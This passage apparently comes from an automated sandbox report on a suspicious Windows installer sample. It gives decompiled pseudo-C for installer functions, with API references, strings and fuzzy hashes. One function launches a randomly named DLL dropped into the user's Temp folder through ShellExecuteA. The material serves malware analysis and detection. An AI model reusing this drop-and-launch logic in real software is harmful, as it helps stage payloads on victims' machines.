				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404651
0x0040465e
0x00404664
0x004046a2
0x004046a2
0x004046b1
0x004046b8
0x00000000
0x004046ba
0x00404666
0x00404675
0x0040467d
0x00404680
0x00404692
0x00404698
0x0040469f
0x00000000
0x0040469f
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040465E
GetMessagePos.USER32 ref: 00404666
ScreenToClient.USER32 ref: 00404680
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404692
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046B8

Strings

f, xrefs: 00404694

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
Instruction ID: c161ae2f8e6b182b0fd34984c2a0c6d9d452551e98057f29495dc0983078c510
Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
Instruction Fuzzy Hash: A7019E71D00218BADB00DBA4CC81BFFBBBCAB45711F10412BBB00F62C0D3B8A9418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b048 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x414c50; // 0x7c00
					_t7 =  *0x428c58;
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x414c10,  *0x40b048, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x414c10);
					SetDlgItemTextA(_t16, 0x406, 0x414c10);
					ShowWindow(_t16, 5);
				}
				return 0;
			}

0x00402bb7
0x00402bbf
0x00402bcb
0x00402bd4
0x00402bd7
0x00402bd7
0x00402bdf
0x00402be1
0x00402be7
0x00402bee
0x00402bf0
0x00402bf0
0x00402c09
0x00402c14
0x00402c21
0x00402c29
0x00402c29
0x00402c34

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
MulDiv.KERNEL32(00007C00,00000064,?), ref: 00402BF6
wsprintfA.USER32 ref: 00402C09
SetWindowTextA.USER32(?,00414C10), ref: 00402C14
SetDlgItemTextA.USER32 ref: 00402C21
ShowWindow.USER32(?,00000005,?,00000406,00414C10), ref: 00402C29

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow$ItemShowTimerwsprintf
String ID:
API String ID: 559026099-0
Opcode ID: 1bf024436dbc0d01cb52e4f76fdb7ff34a3bb134a71d5a22670ee3ec0b6572fb
Instruction ID: da11a6cf77eab8a7fe7ea890cfaf0f22c23191f336b5e04c96ce70fa4cb2a612
Opcode Fuzzy Hash: 1bf024436dbc0d01cb52e4f76fdb7ff34a3bb134a71d5a22670ee3ec0b6572fb
Instruction Fuzzy Hash: 7501B570600214ABD7215F15AD09FEF3B68EB45721F00843AFA05BA2D0DBB864509BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\jones\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x00401e3c
0x00401e45
0x00401e47
0x00401e4c
0x00401e4d
0x00401e58
0x00401e5a
0x00401e65
0x00401e71
0x00401e7f
0x00401e91
0x004026da
0x004026da
0x00402932
0x0040293e

APIs

wsprintfA.USER32 ref: 00401E5A
ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88

Strings

C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll, xrefs: 00401E53
%s %s, xrefs: 00401E4E
C:\Users\user\AppData\Local\Temp, xrefs: 00401E73

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShellwsprintf
String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll
API String ID: 2956387742-317302250
Opcode ID: 325ce4e6db7db2d43a24a0a054918743e22d24fe983c8af644ce1b1221345b66
Instruction ID: d9aa26d169122715fb4d9242c6ec18ca088ab24489bb6374a4c731177bc8625c
Opcode Fuzzy Hash: 325ce4e6db7db2d43a24a0a054918743e22d24fe983c8af644ce1b1221345b66
Instruction Fuzzy Hash: 90F0F471B04200AEC711ABB59D4AF6E3AA8DB11319F200837F001F61D3D5BD88519768

Uniqueness

Uniqueness Score: -1.00%

Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}

0x00402af5
0x00402afd
0x00402b25
0x00402b0f
0x00402b56
0x00000000
0x00402b5e
0x00402b23
0x00000000
0x00000000
0x00402b23
0x00402b3a
0x00000000
0x00402b46
0x00402b50

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
RegCloseKey.ADVAPI32(?), ref: 00402B3A
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
RegCloseKey.ADVAPI32(?), ref: 00402B56

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
Opcode Fuzzy Hash: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d3e
0x00401d45
0x00401d74
0x00401d7c
0x00401d83
0x00401d83
0x00402932
0x0040293e

APIs

GetDlgItem.USER32 ref: 00401D38
GetClientRect.USER32 ref: 00401D45
LoadImageA.USER32 ref: 00401D66
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
DeleteObject.GDI32(00000000), ref: 00401D83

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5da6e5cd00a1277bc603e5448242defb56d1d49a981dc3d01ba33d8312d7bfb7
Instruction ID: 273f5d2522af92408d9d707f912642cc01ca42a216635a10685a7a38cf896988
Opcode Fuzzy Hash: 5da6e5cd00a1277bc603e5448242defb56d1d49a981dc3d01ba33d8312d7bfb7
Instruction Fuzzy Hash: 78F0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105476F601F2191C7789D418B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040557B, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040557B(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405331
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405513(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

0x00405584
0x00405584
0x0040558b
0x0040558e
0x00405593
0x004055a6
0x004055c0
0x00000000
0x004055c0
0x004055aa
0x004055ab
0x004055ae
0x004055af
0x004055b7
0x00000000
0x00000000
0x004055b9
0x004055bc
0x00000000
0x00000000
0x00000000
0x004055bc
0x00000000
0x0040559c
0x00000000
0x0040559d

APIs

CharNextA.USER32(1S@,?,0042BCA8,C:\Users\user\AppData\Local\Temp\,004055DF,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000), ref: 00405589
CharNextA.USER32(00000000), ref: 0040558E
CharNextA.USER32(00000000), ref: 0040559D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040557B
1S@, xrefs: 00405584, 00405588

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID: 1S@$C:\Users\user\AppData\Local\Temp\
API String ID: 3213498283-2839724025
Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
Instruction ID: a38fbd83576ea772fbec08ada66f215e8512e3b4ef80e4756add6815f90ed6c2
Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
Instruction Fuzzy Hash: 24F0A791A14F217EEB3262644C44B6B5FEDDB95720F140477E241B61D5D3BC4C42CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00404561, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00404561(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059FD(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059FD(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059FD(_t34, 0, 0x42a8a0, 0x42a8a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x42a8a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a8a0);
			}

0x00404569
0x0040456d
0x00404575
0x00404578
0x00404579
0x0040457b
0x0040457d
0x00404580
0x00404580
0x00404587
0x0040458d
0x0040458d
0x00404594
0x0040459f
0x004045a0
0x004045a3
0x004045a3
0x004045b0
0x004045bb
0x004045be
0x004045d0
0x004045d7
0x004045d8
0x004045e7
0x004045f7
0x00404613

APIs

lstrlenA.KERNEL32(0042A8A0,0042A8A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404481,000000DF,?,00000000,00000400), ref: 004045EF
wsprintfA.USER32 ref: 004045F7
SetDlgItemTextA.USER32 ref: 0040460A

Strings

%u.%u%s%s, xrefs: 004045D9

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 55c911bb95cf7588d6af741ae256193dafe342a2ef030f34ff05c61eeb47f464
Instruction ID: a11c77c1d28780ca16a25841ba49bfe078be5d3d3c6fb1a2dd9ec20d76d43e14
Opcode Fuzzy Hash: 55c911bb95cf7588d6af741ae256193dafe342a2ef030f34ff05c61eeb47f464
Instruction Fuzzy Hash: 1B110473A001387BDB00666D9C46EAF365DCBC6334F14023BFA25F61D1E9788C1296A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405952(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405952(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E00405939();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x00401c19
0x00401c22
0x00401c2e
0x00401c31
0x00401c3b
0x00401c3b
0x00401c3e
0x00401c42
0x00401c4c
0x00401c4c
0x00401c4f
0x00401c53
0x00401c55
0x00401ca2
0x00401ca4
0x00401cad
0x00401cb5
0x00401cb8
0x00401cb8
0x00401cc1
0x00000000
0x00401c57
0x00401c5e
0x00401c60
0x00401c68
0x00401c6b
0x00401c93
0x00401cc7
0x00401cc7
0x00401c6d
0x00401c7b
0x00401c83
0x00401c86
0x00401c86
0x00401c6b
0x00401cca
0x00401ccd
0x00401cd3
0x004028d7
0x004028d7
0x00402932
0x0040293e

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93

Strings

!, xrefs: 00401C4F

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: bdb3484cc01cc4fd924d1c2f7cd2782c3e3dde487251ead39a63a2e7085da7fd
Instruction ID: 16c78498dd1c2a75f25d2486059e8ad8e4f8cfcc0dd16789622c6010fc6d5132
Opcode Fuzzy Hash: bdb3484cc01cc4fd924d1c2f7cd2782c3e3dde487251ead39a63a2e7085da7fd
Instruction Fuzzy Hash: 0321A171A44209BEEF01AFB0CD4AAED7FB1EF44304F10443AF501BA1E1D7B98A519B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040380E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040380E(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405952(__ecx, "1033");
				while(1) {
					_t26 =  *0x42f464;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42f428 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42f460;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42ec00 = _t18[1];
					 *0x42f4c8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42ebfc = _t23;
						E00405939(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a880, E004059FD(_t13, _t24, _t26, "arability Setup", 0xfffffffe));
						_t11 =  *0x42f44c;
						_t27 =  *0x42f448;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E004059FD(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403812
0x00403817
0x0040381d
0x00403822
0x00403822
0x0040382a
0x00000000
0x00000000
0x00403832
0x0040383a
0x0040383c
0x00403842
0x00403842
0x00403844
0x00403850
0x00000000
0x00000000
0x00403854
0x00000000
0x00000000
0x00000000
0x00403856
0x0040385b
0x00403864
0x0040386a
0x0040386f
0x00403883
0x0040388e
0x004038a6
0x004038ac
0x004038b1
0x004038b9
0x004038da
0x004038da
0x004038da
0x004038bb
0x004038bd
0x004038bd
0x004038c1
0x004038c8
0x004038c8
0x004038cd
0x004038d3
0x004038d3
0x00000000
0x004038bd
0x00403871
0x00403876
0x0040387f
0x00403878
0x00403878
0x00403878
0x00403876

APIs

SetWindowTextA.USER32(00000000,arability Setup), ref: 004038A6

Strings

1033, xrefs: 00403812, 0040381C, 0040388D
arability Setup, xrefs: 00403895
m:X, xrefs: 00403883

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow
String ID: 1033$arability Setup$m:X
API String ID: 530164218-3245964170
Opcode ID: 2e6dc91df21bd32c357a542dcf52ef06f39965d5d1ff0679fec69d0b837b48a4
Instruction ID: 80233f8be37abeb08f7c7b571dfb44847f9404f2ebf597b18c2e1cddc1fdd98f
Opcode Fuzzy Hash: 2e6dc91df21bd32c357a542dcf52ef06f39965d5d1ff0679fec69d0b837b48a4
Instruction Fuzzy Hash: 1B11D476B002119BC724BF56DC40E333BEDEB5476535881BBF801673A1DA3999068A59

Uniqueness

Uniqueness Score: -1.00%

Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D7E(0xffffffeb, _t13);
				_t15 = E00405263(_t28, "C:\\Users\\jones\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405D18(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405939(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00401ea2
0x00401ea7
0x00401eb2
0x00401eb9
0x00401ebc
0x004026da
0x00401ec2
0x00401ec5
0x00401ed6
0x00401ed1
0x00401ed1
0x00401eeb
0x00401ef4
0x00401f04
0x00401f06
0x00401f06
0x00401ef6
0x00401efa
0x00401efa
0x00401ef4
0x00401f0d
0x00401f10
0x00401f10
0x00402932
0x0040293e

APIs

Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,73BCEA30), ref: 00404DDA
Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
